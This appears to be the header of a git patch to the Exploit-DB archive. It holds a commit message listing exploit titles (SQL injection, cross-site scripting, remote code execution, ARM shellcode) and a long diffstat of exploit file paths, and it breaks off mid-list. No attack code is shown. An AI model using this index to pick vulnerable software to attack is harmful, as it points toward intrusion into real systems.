From ed0e1e4d4446a087b715c8e938a49559f7cba8cf Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 25 Sep 2018 05:01:51 +0000 Subject: [PATCH] DB: 2018-09-25 1979 changes to exploits/shellcodes Couchdb 1.5.0 - 'uuids' Denial of Service Apache CouchDB 1.5.0 - 'uuids' Denial of Service Beyond Remote 2.2.5.3 - Denial of Service (PoC) udisks2 2.8.0 - Denial of Service (PoC) Termite 3.4 - Denial of Service (PoC) SoftX FTP Client 3.3 - Denial of Service (PoC) Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection Silverstripe CMS 3.0.2 - Multiple Vulnerabilities SilverStripe CMS 3.0.2 - Multiple Vulnerabilities Silverstripe CMS 2.4 - File Renaming Security Bypass SilverStripe CMS 2.4 - File Renaming Security Bypass Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload SilverStripe CMS Pixlr Image Editor - 'upload.php' Arbitrary File Upload Silverstripe CMS 2.4.x - 'BackURL' Open Redirection SilverStripe CMS 2.4.x - 'BackURL' Open Redirection Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure SilverStripe CMS - 'MemberLoginForm.php' Information Disclosure Silverstripe CMS - Multiple HTML Injection Vulnerabilities SilverStripe CMS - Multiple HTML Injection Vulnerabilities Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation Monstra CMS before 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (2) Monstra CMS < 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (1) Navigate CMS 2.8 - Cross-Site Scripting Collectric CMU 1.0 - 'lang' SQL injection Joomla! Component CW Article Attachments 1.0.6 - 'id' SQL Injection LG SuperSign EZ CMS 2.5 - Remote Code Execution MyBB Visual Editor 1.8.18 - Cross-Site Scripting Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection RICOH Aficio MP 301 Printer - Cross-Site Scripting Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection RICOH MP C6003 Printer - Cross-Site Scripting Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes) Linux/ARM - sigaction() Based Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (52 Bytes) --- exploits/android/dos/38555.txt | 2 +- exploits/android/dos/38557.txt | 2 +- exploits/android/dos/38610.txt | 2 +- exploits/android/dos/38611.txt | 2 +- exploits/android/dos/38612.txt | 2 +- exploits/android/dos/38613.txt | 2 +- exploits/android/dos/38614.txt | 2 +- exploits/android/dos/39424.txt | 2 +- exploits/android/dos/39425.txt | 2 +- exploits/android/dos/39629.txt | 2 +- exploits/android/dos/39651.txt | 2 +- exploits/android/dos/39685.txt | 2 +- exploits/android/dos/39686.txt | 2 +- exploits/android/dos/39921.txt | 2 +- exploits/android/dos/40381.txt | 2 +- exploits/android/dos/40449.txt | 2 +- exploits/android/dos/40515.txt | 2 +- exploits/android/dos/40876.txt | 2 +- exploits/android/dos/40945.txt | 2 +- exploits/android/dos/40993.txt | 2 +- exploits/android/dos/41161.txt | 2 +- exploits/android/dos/41211.txt | 2 +- exploits/android/dos/41212.txt | 2 +- exploits/android/dos/41218.txt | 2 +- exploits/android/dos/41232.txt | 2 +- exploits/android/dos/41351.txt | 2 +- exploits/android/dos/41352.txt | 2 +- exploits/android/dos/41353.txt | 2 +- exploits/android/dos/41354.txt | 2 +- exploits/android/dos/41355.txt | 2 +- exploits/android/dos/41981.txt | 2 +- exploits/android/dos/41982.txt | 2 +- exploits/android/dos/41983.txt | 2 +- exploits/android/dos/42169.txt | 2 +- exploits/android/dos/42170.txt | 2 +- exploits/android/dos/42171.txt | 2 +- exploits/android/dos/42285.txt | 2 +- exploits/android/dos/43464.txt | 2 +- exploits/android/dos/43513.txt | 2 +- exploits/android/dos/43996.txt | 2 +- exploits/android/dos/44268.txt | 2 +- exploits/android/dos/44724.txt | 2 +- exploits/android/local/39757.txt | 2 +- exploits/android/local/40066.txt | 2 +- exploits/android/local/41130.txt | 2 +- exploits/android/local/41217.txt | 2 +- exploits/android/local/42601.txt | 2 +- exploits/android/local/45192.txt | 2 +- exploits/android/local/45379.txt | 2 +- exploits/android/local/9477.txt | 2 +- exploits/android/remote/39640.txt | 2 +- exploits/android/remote/40354.txt | 2 +- exploits/android/remote/40874.txt | 2 +- exploits/arm/dos/40182.txt | 2 +- exploits/asp/remote/15213.pl | 2 +- exploits/asp/webapps/42776.txt | 2 +- exploits/asp/webapps/8719.py | 2 +- exploits/beos/local/19840.txt | 2 +- exploits/bsd/local/19411.txt | 2 +- exploits/bsd/local/23655.txt | 2 +- exploits/bsd/remote/19520.txt | 2 +- exploits/cgi/webapps/40272.txt | 2 +- exploits/cgi/webapps/40273.txt | 2 +- exploits/cgi/webapps/40274.txt | 2 +- exploits/freebsd/local/12090.txt | 2 +- exploits/freebsd/local/12091.txt | 2 +- exploits/freebsd/remote/17462.txt | 2 +- exploits/freebsd/remote/18181.txt | 2 +- exploits/freebsd/remote/20593.txt | 2 +- exploits/freebsd/webapps/12658.txt | 2 +- exploits/hardware/dos/11043.txt | 2 +- exploits/hardware/dos/12093.txt | 2 +- exploits/hardware/dos/13823.txt | 2 +- exploits/hardware/dos/13824.txt | 2 +- exploits/hardware/dos/13825.txt | 2 +- exploits/hardware/dos/18751.txt | 2 +- exploits/hardware/dos/20821.txt | 2 +- exploits/hardware/dos/20824.txt | 2 +- exploits/hardware/dos/21092.txt | 2 +- exploits/hardware/dos/22596.txt | 2 +- exploits/hardware/dos/22978.txt | 2 +- exploits/hardware/dos/23876.txt | 2 +- exploits/hardware/dos/23900.txt | 2 +- exploits/hardware/dos/28228.txt | 2 +- exploits/hardware/dos/41806.txt | 2 +- exploits/hardware/dos/43490.txt | 2 +- exploits/hardware/dos/44197.md | 2 +- exploits/hardware/dos/8013.txt | 2 +- exploits/hardware/local/21001.txt | 2 +- exploits/hardware/local/40271.txt | 2 +- exploits/hardware/local/43397.md | 2 +- exploits/hardware/local/44198.md | 2 +- exploits/hardware/local/44200.md | 2 +- exploits/hardware/local/44206.c | 2 +- exploits/hardware/local/44644.txt | 2 +- exploits/hardware/local/44818.md | 2 +- exploits/hardware/local/44820.txt | 2 +- exploits/hardware/remote/12298.txt | 2 +- exploits/hardware/remote/18291.txt | 2 +- exploits/hardware/remote/19538.txt | 6 +- exploits/hardware/remote/2034.txt | 2 +- exploits/hardware/remote/22532.txt | 2 +- exploits/hardware/remote/23212.txt | 2 +- exploits/hardware/remote/28056.txt | 2 +- exploits/hardware/remote/31132.txt | 2 +- exploits/hardware/remote/33869.txt | 2 +- exploits/hardware/remote/34465.txt | 2 +- exploits/hardware/remote/40258.txt | 2 +- exploits/hardware/remote/40275.txt | 2 +- exploits/hardware/remote/41298.txt | 2 +- exploits/hardware/remote/41805.txt | 2 +- exploits/hardware/remote/41808.txt | 2 +- exploits/hardware/remote/44196.md | 2 +- exploits/hardware/remote/44574.txt | 2 +- exploits/hardware/remote/8269.txt | 2 +- exploits/hardware/webapps/11101.txt | 2 +- exploits/hardware/webapps/12092.txt | 2 +- exploits/hardware/webapps/29959.txt | 2 +- exploits/hardware/webapps/34254.txt | 2 +- exploits/hardware/webapps/40276.txt | 2 +- exploits/hardware/webapps/40690.txt | 2 +- exploits/hardware/webapps/45446.txt | 23 ++++ exploits/hardware/webapps/45448.py | 36 ++++++ exploits/hardware/webapps/45454.txt | 31 +++++ exploits/hardware/webapps/45460.txt | 31 +++++ exploits/ios/dos/39359.txt | 2 +- exploits/ios/dos/39360.txt | 2 +- exploits/ios/dos/39361.txt | 2 +- exploits/ios/dos/39362.txt | 2 +- exploits/ios/dos/39363.txt | 2 +- exploits/ios/dos/39364.txt | 2 +- exploits/ios/dos/40906.txt | 2 +- exploits/ios/dos/42014.txt | 2 +- exploits/ios/local/14538.txt | 2 +- exploits/ios/local/42555.txt | 2 +- exploits/ios/remote/28081.txt | 2 +- exploits/ios/remote/42784.txt | 2 +- exploits/ios/remote/42996.txt | 2 +- exploits/ios/remote/4522.html | 2 +- exploits/java/dos/41965.txt | 2 +- exploits/java/remote/30502.txt | 2 +- exploits/java/remote/39007.txt | 2 +- exploits/java/remote/39854.txt | 2 +- exploits/java/webapps/40817.txt | 2 +- exploits/java/webapps/40842.txt | 4 +- exploits/linux/dos/10203.txt | 2 +- exploits/linux/dos/10206.txt | 4 +- exploits/linux/dos/14573.txt | 2 +- exploits/linux/dos/18295.txt | 2 +- exploits/linux/dos/23427.txt | 2 +- exploits/linux/dos/23757.txt | 2 +- exploits/linux/dos/24815.txt | 2 +- exploits/linux/dos/24865.txt | 2 +- exploits/linux/dos/27762.txt | 6 +- exploits/linux/dos/27764.txt | 2 +- exploits/linux/dos/27765.txt | 2 +- exploits/linux/dos/27925.txt | 2 +- exploits/linux/dos/28348.txt | 2 +- exploits/linux/dos/28358.txt | 2 +- exploits/linux/dos/28367.txt | 2 +- exploits/linux/dos/28380.txt | 2 +- exploits/linux/dos/28383.txt | 2 +- exploits/linux/dos/28384.txt | 2 +- exploits/linux/dos/28895.txt | 2 +- exploits/linux/dos/28912.txt | 2 +- exploits/linux/dos/29399.txt | 2 +- exploits/linux/dos/29520.txt | 2 +- exploits/linux/dos/29723.txt | 2 +- exploits/linux/dos/29809.txt | 2 +- exploits/linux/dos/30024.txt | 2 +- exploits/linux/dos/30648.txt | 2 +- exploits/linux/dos/30776.txt | 2 +- exploits/linux/dos/30837.txt | 2 +- exploits/linux/dos/30894.txt | 2 +- exploits/linux/dos/31018.txt | 8 +- exploits/linux/dos/31054.txt | 2 +- exploits/linux/dos/31218.txt | 2 +- exploits/linux/dos/31552.txt | 2 +- exploits/linux/dos/31553.txt | 2 +- exploits/linux/dos/31554.txt | 2 +- exploits/linux/dos/31984.txt | 2 +- exploits/linux/dos/32018.txt | 2 +- exploits/linux/dos/32019.txt | 2 +- exploits/linux/dos/32452.txt | 2 +- exploits/linux/dos/32740.txt | 2 +- exploits/linux/dos/32775.txt | 2 +- exploits/linux/dos/32800.txt | 2 +- exploits/linux/dos/32856.txt | 2 +- exploits/linux/dos/32857.txt | 2 +- exploits/linux/dos/33017.txt | 2 +- exploits/linux/dos/33049.txt | 2 +- exploits/linux/dos/33088.txt | 4 +- exploits/linux/dos/33101.txt | 2 +- exploits/linux/dos/33134.txt | 2 +- exploits/linux/dos/33222.txt | 2 +- exploits/linux/dos/33223.txt | 2 +- exploits/linux/dos/33224.txt | 2 +- exploits/linux/dos/33228.txt | 2 +- exploits/linux/dos/33233.txt | 4 +- exploits/linux/dos/33283.txt | 2 +- exploits/linux/dos/33524.txt | 2 +- exploits/linux/dos/33549.txt | 2 +- exploits/linux/dos/34228.txt | 2 +- exploits/linux/dos/34249.txt | 2 +- exploits/linux/dos/34278.txt | 2 +- exploits/linux/dos/34279.txt | 2 +- exploits/linux/dos/34427.txt | 2 +- exploits/linux/dos/34953.txt | 2 +- exploits/linux/dos/35081.txt | 2 +- exploits/linux/dos/35173.txt | 2 +- exploits/linux/dos/35432.txt | 2 +- exploits/linux/dos/36633.txt | 2 +- exploits/linux/dos/36669.txt | 2 +- exploits/linux/dos/37839.txt | 2 +- exploits/linux/dos/37866.txt | 2 +- exploits/linux/dos/37867.txt | 2 +- exploits/linux/dos/37869.txt | 2 +- exploits/linux/dos/37870.txt | 2 +- exploits/linux/dos/38620.txt | 2 +- exploits/linux/dos/38778.txt | 2 +- exploits/linux/dos/39229.cpp | 2 +- exploits/linux/dos/39454.txt | 2 +- exploits/linux/dos/39491.txt | 2 +- exploits/linux/dos/39492.txt | 2 +- exploits/linux/dos/39493.txt | 2 +- exploits/linux/dos/39494.txt | 2 +- exploits/linux/dos/39545.txt | 2 +- exploits/linux/dos/39638.txt | 2 +- exploits/linux/dos/39773.txt | 2 +- exploits/linux/dos/39940.txt | 2 +- exploits/linux/dos/39941.txt | 2 +- exploits/linux/dos/39942.txt | 2 +- exploits/linux/dos/39943.txt | 2 +- exploits/linux/dos/39944.txt | 2 +- exploits/linux/dos/39961.txt | 2 +- exploits/linux/dos/40291.txt | 2 +- exploits/linux/dos/42138.txt | 2 +- exploits/linux/dos/42139.txt | 2 +- exploits/linux/dos/42147.txt | 2 +- exploits/linux/dos/42148.txt | 2 +- exploits/linux/dos/42162.txt | 2 +- exploits/linux/dos/42198.txt | 2 +- exploits/linux/dos/42199.txt | 2 +- exploits/linux/dos/42200.txt | 2 +- exploits/linux/dos/42201.txt | 2 +- exploits/linux/dos/42202.txt | 2 +- exploits/linux/dos/42203.txt | 2 +- exploits/linux/dos/42204.txt | 2 +- exploits/linux/dos/42207.txt | 2 +- exploits/linux/dos/42258.txt | 2 +- exploits/linux/dos/42259.txt | 2 +- exploits/linux/dos/42299.txt | 2 +- exploits/linux/dos/42300.txt | 2 +- exploits/linux/dos/42301.txt | 2 +- exploits/linux/dos/42386.txt | 2 +- exploits/linux/dos/42389.txt | 2 +- exploits/linux/dos/42390.txt | 2 +- exploits/linux/dos/42391.txt | 2 +- exploits/linux/dos/42396.txt | 2 +- exploits/linux/dos/42397.txt | 2 +- exploits/linux/dos/42398.txt | 2 +- exploits/linux/dos/42399.txt | 2 +- exploits/linux/dos/42400.txt | 2 +- exploits/linux/dos/42409.txt | 2 +- exploits/linux/dos/42433.txt | 2 +- exploits/linux/dos/42546.txt | 2 +- exploits/linux/dos/42600.txt | 2 +- exploits/linux/dos/42970.txt | 4 +- exploits/linux/dos/43014.txt | 2 +- exploits/linux/dos/43322.txt | 2 +- exploits/linux/dos/44254.py | 2 +- exploits/linux/dos/44265.py | 2 +- exploits/linux/dos/44490.txt | 2 +- exploits/linux/dos/44519.txt | 2 +- exploits/linux/dos/45268.txt | 2 +- exploits/linux/dos/45450.txt | 39 ++++++ exploits/linux/local/1596.txt | 2 +- exploits/linux/local/1831.txt | 2 +- exploits/linux/local/19803.txt | 2 +- exploits/linux/local/19813.txt | 2 +- exploits/linux/local/19915.txt | 2 +- exploits/linux/local/20843.txt | 2 +- exploits/linux/local/20926.txt | 2 +- exploits/linux/local/21062.txt | 2 +- exploits/linux/local/21063.txt | 2 +- exploits/linux/local/21124.txt | 2 +- exploits/linux/local/21229.txt | 2 +- exploits/linux/local/21248.txt | 2 +- exploits/linux/local/21375.txt | 2 +- exploits/linux/local/21458.txt | 2 +- exploits/linux/local/21763.txt | 2 +- exploits/linux/local/22189.txt | 2 +- exploits/linux/local/22190.txt | 2 +- exploits/linux/local/25707.txt | 2 +- exploits/linux/local/29714.txt | 2 +- exploits/linux/local/31911.txt | 6 +- exploits/linux/local/33395.txt | 2 +- exploits/linux/local/34421.c | 2 +- exploits/linux/local/34537.txt | 2 +- exploits/linux/local/35749.txt | 2 +- exploits/linux/local/37168.txt | 2 +- exploits/linux/local/3730.txt | 2 +- exploits/linux/local/38353.txt | 2 +- exploits/linux/local/39771.txt | 2 +- exploits/linux/local/39772.txt | 2 +- exploits/linux/local/39992.md | 2 +- exploits/linux/local/40270.txt | 2 +- exploits/linux/local/40489.txt | 2 +- exploits/linux/local/40936.html | 2 +- exploits/linux/local/40937.txt | 2 +- exploits/linux/local/40943.txt | 4 +- exploits/linux/local/40962.txt | 2 +- exploits/linux/local/41356.txt | 2 +- exploits/linux/local/41597.txt | 2 +- exploits/linux/local/41973.txt | 2 +- exploits/linux/local/42611.txt | 2 +- exploits/linux/local/44204.md | 2 +- exploits/linux/local/44205.md | 2 +- exploits/linux/local/44300.c | 2 +- exploits/linux/local/45372.txt | 2 +- exploits/linux/local/45407.txt | 2 +- exploits/linux/local/7855.txt | 2 +- exploits/linux/local/7856.txt | 2 +- exploits/linux/local/9191.txt | 2 +- exploits/linux/local/9208.txt | 2 +- exploits/linux/local/9435.txt | 2 +- exploits/linux/local/9436.txt | 2 +- exploits/linux/local/9574.txt | 2 +- exploits/linux/local/9598.txt | 2 +- exploits/linux/local/9627.txt | 2 +- exploits/linux/local/9641.txt | 2 +- exploits/linux/local/9844.py | 2 +- exploits/linux/remote/19522.txt | 2 +- exploits/linux/remote/19892.txt | 2 +- exploits/linux/remote/20924.txt | 2 +- exploits/linux/remote/21210.txt | 2 +- exploits/linux/remote/21402.txt | 2 +- exploits/linux/remote/22187.txt | 2 +- exploits/linux/remote/22264.txt | 2 +- exploits/linux/remote/22584.txt | 2 +- exploits/linux/remote/23082.txt | 2 +- exploits/linux/remote/23728.txt | 10 +- exploits/linux/remote/23881.txt | 2 +- exploits/linux/remote/24784.txt | 2 +- exploits/linux/remote/24848.txt | 2 +- exploits/linux/remote/24852.txt | 2 +- exploits/linux/remote/24977.txt | 2 +- exploits/linux/remote/24978.txt | 2 +- exploits/linux/remote/25005.txt | 2 +- exploits/linux/remote/25006.txt | 2 +- exploits/linux/remote/25008.txt | 2 +- exploits/linux/remote/25010.txt | 2 +- exploits/linux/remote/25015.txt | 2 +- exploits/linux/remote/25030.txt | 2 +- exploits/linux/remote/25035.txt | 2 +- exploits/linux/remote/25036.txt | 2 +- exploits/linux/remote/25150.txt | 2 +- exploits/linux/remote/26540.txt | 2 +- exploits/linux/remote/29471.txt | 2 +- exploits/linux/remote/29768.txt | 2 +- exploits/linux/remote/29769.txt | 2 +- exploits/linux/remote/29770.txt | 2 +- exploits/linux/remote/30043.txt | 2 +- exploits/linux/remote/30089.txt | 2 +- exploits/linux/remote/30142.txt | 2 +- exploits/linux/remote/3021.txt | 2 +- exploits/linux/remote/30291.txt | 2 +- exploits/linux/remote/30543.txt | 2 +- exploits/linux/remote/30728.txt | 2 +- exploits/linux/remote/30907.txt | 2 +- exploits/linux/remote/30971.txt | 2 +- exploits/linux/remote/31591.txt | 2 +- exploits/linux/remote/31630.txt | 2 +- exploits/linux/remote/32012.txt | 2 +- exploits/linux/remote/32133.txt | 2 +- exploits/linux/remote/32225.txt | 2 +- exploits/linux/remote/32691.txt | 2 +- exploits/linux/remote/33032.txt | 2 +- exploits/linux/remote/33313.txt | 2 +- exploits/linux/remote/34192.txt | 2 +- exploits/linux/remote/34358.txt | 2 +- exploits/linux/remote/35232.txt | 2 +- exploits/linux/remote/35314.txt | 2 +- exploits/linux/remote/39736.txt | 2 +- exploits/linux/remote/40916.txt | 2 +- exploits/linux/remote/43360.py | 2 +- exploits/linux/remote/5386.txt | 2 +- exploits/linux/remote/5622.txt | 2 +- exploits/linux/remote/5632.rb | 6 +- exploits/linux/remote/5720.py | 2 +- exploits/linux/remote/609.txt | 2 +- exploits/linux/remote/7701.txt | 2 +- exploits/linux/webapps/30085.txt | 2 +- exploits/linux_x86-64/dos/33585.txt | 2 +- exploits/linux_x86-64/dos/37868.txt | 2 +- exploits/linux_x86-64/dos/37876.txt | 2 +- exploits/linux_x86-64/dos/37879.txt | 2 +- exploits/linux_x86-64/dos/37880.txt | 2 +- exploits/linux_x86-64/local/35472.txt | 2 +- exploits/linux_x86-64/local/36310.txt | 2 +- exploits/linux_x86-64/local/36311.txt | 2 +- exploits/linux_x86-64/local/40049.c | 2 +- exploits/linux_x86-64/remote/32277.txt | 2 +- exploits/linux_x86/dos/38763.txt | 2 +- exploits/linux_x86/remote/20032.txt | 2 +- exploits/macos/dos/40954.c | 2 +- exploits/macos/dos/42046.txt | 2 +- exploits/macos/dos/42047.txt | 2 +- exploits/macos/dos/43415.txt | 2 +- exploits/macos/dos/44235.c | 2 +- exploits/macos/dos/44236.c | 2 +- exploits/macos/dos/44561.txt | 2 +- exploits/macos/local/40669.txt | 2 +- exploits/macos/local/40956.c | 2 +- exploits/macos/local/40957.c | 2 +- exploits/macos/local/44234.c | 2 +- exploits/macos/local/44237.md | 2 +- exploits/macos/remote/42125.txt | 2 +- exploits/multiple/dos/10205.txt | 2 +- exploits/multiple/dos/10327.txt | 2 +- exploits/multiple/dos/11142.txt | 2 +- exploits/multiple/dos/14268.txt | 2 +- exploits/multiple/dos/14761.txt | 2 +- exploits/multiple/dos/15086.py | 2 +- exploits/multiple/dos/15215.txt | 2 +- exploits/multiple/dos/15261.txt | 2 +- exploits/multiple/dos/15676.txt | 2 +- exploits/multiple/dos/15707.txt | 2 +- exploits/multiple/dos/15973.txt | 2 +- exploits/multiple/dos/16261.txt | 2 +- exploits/multiple/dos/1709.txt | 2 +- exploits/multiple/dos/17201.php | 2 +- exploits/multiple/dos/1801.txt | 2 +- exploits/multiple/dos/1820.txt | 2 +- exploits/multiple/dos/18600.txt | 2 +- exploits/multiple/dos/18601.txt | 2 +- exploits/multiple/dos/18758.txt | 2 +- exploits/multiple/dos/18877.txt | 2 +- exploits/multiple/dos/18890.txt | 4 +- exploits/multiple/dos/18918.txt | 2 +- exploits/multiple/dos/18919.txt | 16 +-- exploits/multiple/dos/18920.txt | 2 +- exploits/multiple/dos/19380.txt | 2 +- exploits/multiple/dos/19482.txt | 2 +- exploits/multiple/dos/19780.txt | 6 +- exploits/multiple/dos/20052.txt | 2 +- exploits/multiple/dos/20098.txt | 2 +- exploits/multiple/dos/20558.txt | 2 +- exploits/multiple/dos/21572.txt | 2 +- exploits/multiple/dos/21593.txt | 2 +- exploits/multiple/dos/23231.txt | 2 +- exploits/multiple/dos/23556.txt | 2 +- exploits/multiple/dos/23641.txt | 2 +- exploits/multiple/dos/23642.txt | 2 +- exploits/multiple/dos/23755.txt | 2 +- exploits/multiple/dos/23805.txt | 4 +- exploits/multiple/dos/23902.txt | 2 +- exploits/multiple/dos/23904.txt | 2 +- exploits/multiple/dos/24170.txt | 2 +- exploits/multiple/dos/24486.txt | 2 +- exploits/multiple/dos/24668.txt | 2 +- exploits/multiple/dos/24691.txt | 2 +- exploits/multiple/dos/24761.txt | 2 +- exploits/multiple/dos/24793.txt | 2 +- exploits/multiple/dos/24807.txt | 2 +- exploits/multiple/dos/24818.txt | 2 +- exploits/multiple/dos/25081.txt | 2 +- exploits/multiple/dos/25171.txt | 2 +- exploits/multiple/dos/25387.txt | 2 +- exploits/multiple/dos/25388.txt | 2 +- exploits/multiple/dos/25389.txt | 2 +- exploits/multiple/dos/25584.txt | 2 +- exploits/multiple/dos/25692.txt | 2 +- exploits/multiple/dos/25757.txt | 2 +- exploits/multiple/dos/25791.txt | 2 +- exploits/multiple/dos/2587.txt | 2 +- exploits/multiple/dos/27108.txt | 2 +- exploits/multiple/dos/27140.txt | 2 +- exploits/multiple/dos/27365.txt | 2 +- exploits/multiple/dos/27547.txt | 2 +- exploits/multiple/dos/27993.txt | 2 +- exploits/multiple/dos/28345.txt | 2 +- exploits/multiple/dos/28666.txt | 2 +- exploits/multiple/dos/2910.txt | 2 +- exploits/multiple/dos/2911.txt | 2 +- exploits/multiple/dos/2912.txt | 2 +- exploits/multiple/dos/30498.txt | 2 +- exploits/multiple/dos/30513.txt | 4 +- exploits/multiple/dos/30519.txt | 2 +- exploits/multiple/dos/30524.txt | 2 +- exploits/multiple/dos/30529.txt | 2 +- exploits/multiple/dos/30540.txt | 2 +- exploits/multiple/dos/30566.txt | 2 +- exploits/multiple/dos/30574.txt | 2 +- exploits/multiple/dos/30779.txt | 2 +- exploits/multiple/dos/30791.txt | 2 +- exploits/multiple/dos/30856.txt | 2 +- exploits/multiple/dos/30943.txt | 2 +- exploits/multiple/dos/30989.txt | 2 +- exploits/multiple/dos/30990.txt | 4 +- exploits/multiple/dos/30991.txt | 2 +- exploits/multiple/dos/31136.txt | 2 +- exploits/multiple/dos/31148.txt | 2 +- exploits/multiple/dos/31150.txt | 2 +- exploits/multiple/dos/31232.txt | 2 +- exploits/multiple/dos/31271.txt | 2 +- exploits/multiple/dos/31285.txt | 2 +- exploits/multiple/dos/31327.txt | 4 +- exploits/multiple/dos/31343.txt | 2 +- exploits/multiple/dos/31542.txt | 2 +- exploits/multiple/dos/31728.txt | 4 +- exploits/multiple/dos/31932.txt | 2 +- exploits/multiple/dos/31957.txt | 2 +- exploits/multiple/dos/31958.txt | 2 +- exploits/multiple/dos/31998.txt | 2 +- exploits/multiple/dos/32006.txt | 6 +- exploits/multiple/dos/32104.txt | 2 +- exploits/multiple/dos/32125.txt | 2 +- exploits/multiple/dos/32127.txt | 2 +- exploits/multiple/dos/32192.txt | 4 +- exploits/multiple/dos/32362.txt | 2 +- exploits/multiple/dos/32386.txt | 2 +- exploits/multiple/dos/33080.txt | 2 +- exploits/multiple/dos/33083.txt | 2 +- exploits/multiple/dos/33099.txt | 2 +- exploits/multiple/dos/33100.txt | 2 +- exploits/multiple/dos/33104.txt | 2 +- exploits/multiple/dos/33105.txt | 2 +- exploits/multiple/dos/33182.txt | 4 +- exploits/multiple/dos/33735.txt | 2 +- exploits/multiple/dos/34270.txt | 2 +- exploits/multiple/dos/34340.txt | 2 +- exploits/multiple/dos/34360.txt | 2 +- exploits/multiple/dos/34457.txt | 2 +- exploits/multiple/dos/35369.txt | 2 +- exploits/multiple/dos/36570.txt | 2 +- exploits/multiple/dos/37850.txt | 2 +- exploits/multiple/dos/37852.txt | 2 +- exploits/multiple/dos/37855.txt | 2 +- exploits/multiple/dos/37859.txt | 2 +- exploits/multiple/dos/37863.txt | 2 +- exploits/multiple/dos/37864.txt | 2 +- exploits/multiple/dos/37865.txt | 2 +- exploits/multiple/dos/37871.txt | 2 +- exploits/multiple/dos/37872.txt | 2 +- exploits/multiple/dos/37873.txt | 2 +- exploits/multiple/dos/37874.txt | 2 +- exploits/multiple/dos/37877.txt | 2 +- exploits/multiple/dos/37878.txt | 2 +- exploits/multiple/dos/37882.txt | 2 +- exploits/multiple/dos/38490.txt | 2 +- exploits/multiple/dos/38662.txt | 2 +- exploits/multiple/dos/38930.txt | 2 +- exploits/multiple/dos/38931.txt | 2 +- exploits/multiple/dos/38932.txt | 2 +- exploits/multiple/dos/38933.txt | 2 +- exploits/multiple/dos/38969.txt | 2 +- exploits/multiple/dos/38970.txt | 2 +- exploits/multiple/dos/38992.txt | 2 +- exploits/multiple/dos/38993.txt | 2 +- exploits/multiple/dos/38994.txt | 2 +- exploits/multiple/dos/38995.txt | 2 +- exploits/multiple/dos/38996.txt | 2 +- exploits/multiple/dos/38997.txt | 2 +- exploits/multiple/dos/38998.txt | 2 +- exploits/multiple/dos/38999.txt | 2 +- exploits/multiple/dos/39000.txt | 2 +- exploits/multiple/dos/39001.txt | 2 +- exploits/multiple/dos/39002.txt | 2 +- exploits/multiple/dos/39003.txt | 2 +- exploits/multiple/dos/39004.txt | 2 +- exploits/multiple/dos/39005.txt | 2 +- exploits/multiple/dos/39006.txt | 2 +- exploits/multiple/dos/39039.txt | 2 +- exploits/multiple/dos/39076.txt | 2 +- exploits/multiple/dos/39077.txt | 2 +- exploits/multiple/dos/39162.txt | 2 +- exploits/multiple/dos/39163.txt | 2 +- exploits/multiple/dos/39164.txt | 2 +- exploits/multiple/dos/39165.txt | 2 +- exploits/multiple/dos/39219.txt | 2 +- exploits/multiple/dos/39321.txt | 2 +- exploits/multiple/dos/39322.txt | 2 +- exploits/multiple/dos/39323.txt | 2 +- exploits/multiple/dos/39324.txt | 2 +- exploits/multiple/dos/39325.txt | 2 +- exploits/multiple/dos/39326.txt | 2 +- exploits/multiple/dos/39327.txt | 2 +- exploits/multiple/dos/39358.txt | 2 +- exploits/multiple/dos/39379.txt | 2 +- exploits/multiple/dos/39401.txt | 2 +- exploits/multiple/dos/39426.txt | 2 +- exploits/multiple/dos/39460.txt | 2 +- exploits/multiple/dos/39461.txt | 2 +- exploits/multiple/dos/39462.txt | 2 +- exploits/multiple/dos/39463.txt | 2 +- exploits/multiple/dos/39464.txt | 2 +- exploits/multiple/dos/39465.txt | 2 +- exploits/multiple/dos/39466.txt | 2 +- exploits/multiple/dos/39467.txt | 2 +- exploits/multiple/dos/39476.txt | 2 +- exploits/multiple/dos/39482.txt | 2 +- exploits/multiple/dos/39483.txt | 2 +- exploits/multiple/dos/39484.txt | 2 +- exploits/multiple/dos/39490.txt | 2 +- exploits/multiple/dos/39503.txt | 2 +- exploits/multiple/dos/39529.txt | 2 +- exploits/multiple/dos/39551.txt | 2 +- exploits/multiple/dos/39604.txt | 2 +- exploits/multiple/dos/39633.txt | 2 +- exploits/multiple/dos/39634.txt | 2 +- exploits/multiple/dos/39635.txt | 2 +- exploits/multiple/dos/39644.txt | 2 +- exploits/multiple/dos/39649.txt | 2 +- exploits/multiple/dos/39650.txt | 2 +- exploits/multiple/dos/39652.txt | 2 +- exploits/multiple/dos/39748.txt | 2 +- exploits/multiple/dos/39749.txt | 2 +- exploits/multiple/dos/39750.txt | 2 +- exploits/multiple/dos/39768.txt | 2 +- exploits/multiple/dos/39799.txt | 2 +- exploits/multiple/dos/39812.txt | 2 +- exploits/multiple/dos/39824.txt | 2 +- exploits/multiple/dos/39825.txt | 2 +- exploits/multiple/dos/39826.txt | 2 +- exploits/multiple/dos/39827.txt | 2 +- exploits/multiple/dos/39828.txt | 2 +- exploits/multiple/dos/39829.txt | 2 +- exploits/multiple/dos/39830.txt | 2 +- exploits/multiple/dos/39831.txt | 2 +- exploits/multiple/dos/39834.txt | 2 +- exploits/multiple/dos/39835.txt | 2 +- exploits/multiple/dos/39859.txt | 2 +- exploits/multiple/dos/39860.txt | 2 +- exploits/multiple/dos/39861.txt | 2 +- exploits/multiple/dos/39862.txt | 2 +- exploits/multiple/dos/39863.txt | 